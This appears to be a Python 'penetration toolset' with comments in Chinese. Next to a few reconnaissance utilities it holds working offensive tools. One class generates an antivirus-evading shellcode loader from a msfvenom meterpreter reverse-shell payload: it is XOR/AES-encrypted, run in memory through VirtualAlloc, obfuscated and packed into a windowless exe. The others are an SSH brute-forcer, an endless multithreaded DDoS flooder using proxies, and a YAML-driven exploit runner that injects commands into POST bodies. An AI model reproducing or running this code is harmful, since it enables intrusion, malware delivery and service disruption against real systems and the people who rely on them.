from multiprocessing import Queue import os import subprocess import random import threading import concurrent.futures import time import base64 import ctypes import socket import hashlib import paramiko from itertools import cycle from Crypto.Cipher import AES from typing import Any try: import yaml except: print("yaml库不存在,正在安装...") os.system('pip install pyyaml') import yaml try: import fire except ImportError: print("fire库不存在,正在安装...") os.system("pip install fire") try: import requests except ImportError: print("requests库不存在,正在安装...") os.system("pip install requests") class PingTool: """ 基于 subprocess 的 ping 命令或基于 TCP 的 ping 命令 Args: -u : ping 的目标 -t : ping 的类型(icmp 或 tcp) -p : TCP ping 的端口 python penetration_toolset.py PingTool -u 127.0.0.1 -t icmp python penetration_toolset.py PingTool -u 127.0.0.1 -t tcp -p 80 """ def __call__(self, url="", t="icmp", p=0): self.url = url self.ping_type = t self.port = p self.ping() def ping(self): try: if self.ping_type.lower() == "icmp": result = subprocess.run(['ping', self.url], capture_output=True, text=True) print(result.stdout) elif self.ping_type.lower() == "tcp": s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.settimeout(5) # 设置连接超时时间为5秒 if self.port == 0: self.port = 80 # 设置默认端口号为80,或者抛出异常提示用户设置端口号 try: s.connect((self.url, self.port)) print(f"{self.url}:{self.port} is reachable.") except (socket.error, socket.timeout) as e: print(f"{self.url}:{self.port} is unreachable.") finally: s.close() else: print("Unsupported ping type. Please use 'icmp' or 'tcp'.") except Exception as e: print(f"An error occurred: {e}") class searchpath(): """ 这是一个目录扫描命令 参数: -u :url 指定扫描的ur1地址 -c :code 以列表方式指定所要选择的状态码,默认所有状态码 -d :dictionary 指定扫描使用的字典,默认为dict.txt字典 -r :report 指定保存的文件名,默认为url.txt python penetration_toolset.py searchpath -u www.baidu.com """ def __call__(self, url, code=[x for x in range(200, 600)], dictionary='dict.txt', report='./report/report.txt'): # url地址检测 self.url = url if url: res = requests.get(self.url_check(url)) if res.status_code != 200: print("url地址填写失败!") return else: self.url = self.url_check(url) else: self.url = None #初始化默认值 self.dictionary = "./dict/" + dictionary self.report = report if self.report == "./report/report.txt": if self.url[5] == 'http': self.report = "./report/" + self.url[7:] + ".txt" else: self.report = "./report/" + self.url[8:] + ".txt" else: self.report = report self.code = code self.stitch(self.url_check(url)) #url检测 def url_check(self, url): url = self.url if url[:5] == 'https' or url[:5] == 'http:': return url else: return "http://" + url #文件保存 def writeurl(self, result): try: with open(self.report, 'a', encoding="UTF-8") as fp: fp.write(result + '\n') except FileNotFoundError: print(self.report + "文件不存在!") except IOError: print(self.report + "文件读取错误!") except Exception as e: print(self.report + "其他异常:", str(e)) # 目录遍历 def stitch(self, url): url = self.url try: with open(self.dictionary, 'r') as file: for line in file: final_url = url + "/" + line.strip() res = requests.get(final_url) if res.status_code in self.code: print("[-]{:<30} 的状态码为:{:<200}".format(final_url, str(res.status_code))) # print("[-]"+final_url+"的状态码为:"+str(res.status_code)) result = "[-]" + final_url + "的状态码为:" + str(res.status_code) self.writeurl(result) print("[*]" + self.dictionary[7:] + "的结果已保存至: " + self.report[8:]) except FileNotFoundError: print(self.dictionary + "文件不存在!") except IOError: print(self.dictionary + "文件读取错误!") except Exception as e: print(self.dictionary + "其他异常:", str(e)) class encryption(): """ 该代码用于进一步混淆代码通过免杀 前期准备样例: -生成shellcode: msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=9999 -f raw > rev.raw -base64操作: base64 -w 0 -i rev.raw > rev.bs64 -获取payload: 即加密后字符串 -参数: -p: payload:经过msfvenom生成的shellcode的base64加密字符 example: python penetration_toolset.py encryption --payload='aaaapayload123' '""" def __call__(self, payload): self.payload = payload with open('./aes-xor.txt', 'w') as f: f.write(self.aes_jiami(self.xor_jiami(self.payload, 35))) # jiami_sc = self.aes_jiami(self.xor_jiami(self.payload,35)) # sc = self.xor_jiemi(self.aes_jiemi(jiami_sc),35) # shde = base64.b64decode(sc) # self.run(shde) self.shell_write(self.aes_jiami(self.xor_jiami(self.payload, 35))) self.min_code() self.xor_code() self.exe_file() def add_to_16(self, s): while len(s) % 16 != 0: s += '\0' return str.encode(s) # 返回bytes def aes_jiami(self, text): # 密钥长度必须为16、24或32位,分别对应AES-128、AES-192和AES-256 key = 'LeslieCheungKwok' aes = AES.new(self.add_to_16(key), AES.MODE_ECB) encrypted_text = str(base64.encodebytes(aes.encrypt(self.add_to_16(text))), encoding='utf8').replace('\n', '') return encrypted_text def xor_jiami(self, s, key): xor_s = '' for i in s: xor_s += chr(ord(i) ^ key) return xor_s #shellcode生成 def shell_write(self, payload): payload = self.payload str_payload = ''' import base64 import ctypes from Crypto.Cipher import AES kernel32 = ctypes.windll.kernel32 def aes_jiemi(s): cipher = AES.new(b'LeslieCheungKwok', AES.MODE_ECB) return cipher.decrypt(base64.decodebytes(bytes(s, encoding='utf8'))).rstrip(b'\\0').decode('utf8') def xor_jiemi(s,key): xor_s = '' for i in s: xor_s += chr(ord(i) ^ key) return xor_s def write_memory(buf): length = len(buf) kernel32.VirtualAlloc.restype = ctypes.c_void_p ptr = kernel32.VirtualAlloc(None, length, 0x3000, 0x40) kernel32.RtlMoveMemory.argtypes = ( ctypes.c_void_p, ctypes.c_void_p, ctypes.c_size_t) kernel32.RtlMoveMemory(ptr, buf, length) return ptr def run(shellcode): buf = ctypes.create_string_buffer(shellcode) ptr = write_memory(buf) shell_func = ctypes.cast(ptr, ctypes.CFUNCTYPE(None)) shell_func() if __name__ == '__main__': jiami_sc = '{}' sc = xor_jiemi(aes_jiemi(jiami_sc),35) shde = base64.b64decode(sc) run(shde) '''.format(payload) with open('main_one.py', 'w', encoding='utf-8') as file: file.write(str_payload) #缩小python代码 def min_code(self): print("[-] 正在缩小代码....") time.sleep(1) try: os.system("pyminify main_one.py --output main-mini.py") except: print("[-] 该库不存在,正在安装....") os.system("pip install python-minifier") print("[-] 安装成功,正在执行缩小....") try: os.system("pyminify main_one.py --output main-mini.py") #移动文件到“源目录”文件夹下 os.replace("main-mini.py", ".\源文件\main-mini.py") except: print("[-] 缩小失败,请检查代码") # 对main_one.py进行混淆加密 def xor_code(self): try: if os.path.exists("Intensio-Obfuscator"): print("[-] Intensio-Obfuscator工具库存在,正在检测依赖....") if os.system(" pip install -r Intensio-Obfuscator/requirements.txt") == 0: print("[-] 依赖安装成功,正在执行混淆加密....") os.system( "python .\Intensio-Obfuscator\src\intensio_obfuscator\intensio_obfuscator.py -i .\源目录\ -o main_result -mlen lower -rts -ps -rth -ind 2") print("[-] 结果已保存到:main_result文件夹下") print("[-] 正在删除过程文件....") time.sleep(1) os.remove("main_one.py") os.remove("main-mini.py") os.remove("aes-xor.txt") print("[-] 过程文件删除成功") else: print("[-] 依赖安装失败,请检查网络") return except: print("[-] Intensio-Obfuscator工具库不存在,正在安装....") try: os.system("git clone https://github.com/Hnfull/Intensio-Obfuscator.git") except: print("[-] git clone失败,请检查网络") return # 对main_one_obf.py进行打包为exe文件 def exe_file(self): print("[-] 正在生成exe文件....") time.sleep(1) try: os.system("copy ./main_result/main-mini.py ./main_resultone.py") os.system(" pyinstaller.exe -Fw -i ./setting.ico main_resultone.py") except: os.system("pip install pyinstaller") print("[-] pyinstaller安装成功,正在执行打包....") os.system("copy ./main_result/main-mini.py ./main_resultone.py") os.system(" pyinstaller.exe -Fw -i ./setting.ico main_resultone.py") # print("[-] 已删除main_one_obf.py") # os.remove("main_one_obf.py") # os.remove(".\main_result.py") os.remove(".\main_resultone.py") print("[-] 打包成功,请查看dist文件夹") class SSHBruteForce: """ SSH Brute Force Attack -U: 主机 -u: 用户名字典 -p: 密码字典 -P: SSH端口(默认22) example: python penetration_toolset.py SSHBruteForce -U 127.0.0.1 -P 22 -u <用户名字典路径> -p <密码字典路径> ps 第一个是大写的U,第二个参数是大写的P,可不写 """ def __call__(self, U_host, username_dict, password_dict, Port=22): self.U_host = U_host self.port = Port self.username_dict = username_dict self.password_dict = password_dict self.ssh_attack() def ssh_attack(self): with open(self.username_dict, 'r') as users: usernames = [line.strip() for line in users] with open(self.password_dict, 'r') as passwords: passwords = [line.strip() for line in passwords] for username in usernames: for password in passwords: try: ssh = paramiko.SSHClient() ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) ssh.connect(self.U_host, self.port, username, password) print(f'Successful SSH connection to {self.U_host}:{self.port} with credentials {username}:{password}') ssh.close() except paramiko.AuthenticationException: print(f'Failed to authenticate to {self.U_host}:{self.port} with credentials {username}:{password}') except paramiko.SSHException as e: print(f'SSH error on {self.U_host}:{self.port}: {str(e)}') except socket.error as e: print(f'Socket error on {self.U_host}:{self.port}: {str(e)}') class DDOSAttack: """ 基础的DDOS攻击脚本 -u : 指定url -n : 线程数 -p : IP代理池,格式为IP1,IP2,IP3 example: python penetration_toolset.py DDOSAttack -u http://127.0.0.1 -n 3 -p "192.168.1.1,192.168.1.2,192.168.1.3" """ def __call__(self, url, num_threads, proxy_pool): self.url = url self.num_threads = num_threads self.proxy_pool = proxy_pool.split(',') if proxy_pool else None self.proxy_pool_iter = cycle(self.proxy_pool) if self.proxy_pool else None self.attack() def attack(self): print(f"发起DDOS攻击,目标:{self.url},线程数:{self.num_threads}") self.start_attack() def start_attack(self): def send_request(): proxies = {'http': next(self.proxy_pool_iter)} if self.proxy_pool else None while True: try: requests.get(self.url, proxies=proxies) except Exception as e: print(f"An error occurred: {e}") threads = [] for _ in range(self.num_threads): t = threading.Thread(target=send_request) threads.append(t) t.start() for t in threads: t.join() class Para_test(): """ 网站参数测试工具(get) -u 指定url -d 指定字典文件路径 example: python penetration_toolset.py Para_test -u http://www.baidu.com -d ./param.txt """ def __call__(self, url, dictionary_path): self.url = self.validate_url(url) self.dictionary_path = dictionary_path self.test_params() @staticmethod def validate_url(url): """确保URL具有有效的协议头""" if not url.startswith(("http://", "https://")): url = "http://" + url return url @staticmethod def generate_content_hash(content): """生成页面内容的哈希值,用于比较内容变化""" return hashlib.sha256(content.encode('utf-8')).hexdigest() def test_params(self): """测试一组从文件读取的参数来猜测网站接受的参数""" tested_params = {} original_response = requests.get(self.url) original_hash = self.generate_content_hash(original_response.text) with open(self.dictionary_path, 'r', encoding='utf-8') as file: for line in file: param = line.strip() test_url = f"{self.url}?{param}=testvalue" response = requests.get(test_url) response_hash = self.generate_content_hash(response.text) if response_hash != original_hash: tested_params[param] = "有效" else: tested_params[param] = "无效" run_once = True num = 0 for i in tested_params: if tested_params[i] == "有效": print(f"参数: {i}, 结果: {tested_params[i]}") if run_once: num = 1 run_once = False if num == 0: print("未发现有效参数") class exploit(yaml.YAMLObject): """ 用于定向的漏洞利用,获取shell等操作,具有可拓展型,支持yaml配置文件编写poc进行定向攻击测试。 参数: -p:poc 指定使用的yaml文件 example: python penetration_toolset.py exploit -p /test.yml -u 192.168.6.4 """ data = {} def __call__(self, poc, url, cmd=''): self.poc = poc self.url = url self.cmd = cmd if url: res = requests.get(self.url_check(url)) if res.status_code != 200: print("url地址填写失败!") return else: self.url = self.url_check(url) else: self.url = None self.attack() def url_check(self, url): url = self.url if url[:5] == 'https' or url[:5] == 'http:': return url else: return "http://" + url def check_file(self, file_path: str): if not os.path.isfile(file_path): return 0 def read_file(self, poc): file_path = os.getcwd() + "\poc\\" + self.poc if self.check_file(file_path) == 0: print("该文件", file_path, "不存在") else: with open(file_path, "r", encoding="utf-8") as fp: self.data = yaml.load(fp, Loader=yaml.FullLoader) def attack(self): url = self.url self.read_file(self.poc) data = self.data param_url = data.get('poc_url') param_Agent = data.get('User-Agent') param_method = data.get('method') param_cmd = data.get('cmd') cmd = self.cmd # print(param_url[0]['url']) # print(param_Agent) # print(param_method) # print(os.getcwd()+"/poc/"+self.poc) # print(param_method[1]['data']) print("正在攻击...") method = param_method[0]['method'] if method == 'GET': res = requests.get(url=str(url) + param_url[0]["url"], headers=param_Agent[0]) if res.status_code != 200: result = res.text print(result) else: print("返回内容错误,状态码为:" + str(res.status_code)) elif method == 'POST': if param_cmd[0]['cmd'] == 'yes': string_with_format = str(param_method[1]['data']) % cmd res = requests.post(url=str(url) + param_url[0]["url"], data=string_with_format, headers=param_Agent[0]) if res.status_code == 200: result = res.text print(result) else: print("返回内容错误,状态码为:" + str(res.status_code)) else: print("cmd参数错误或不存在") if __name__ == "__main__": fire.Fire()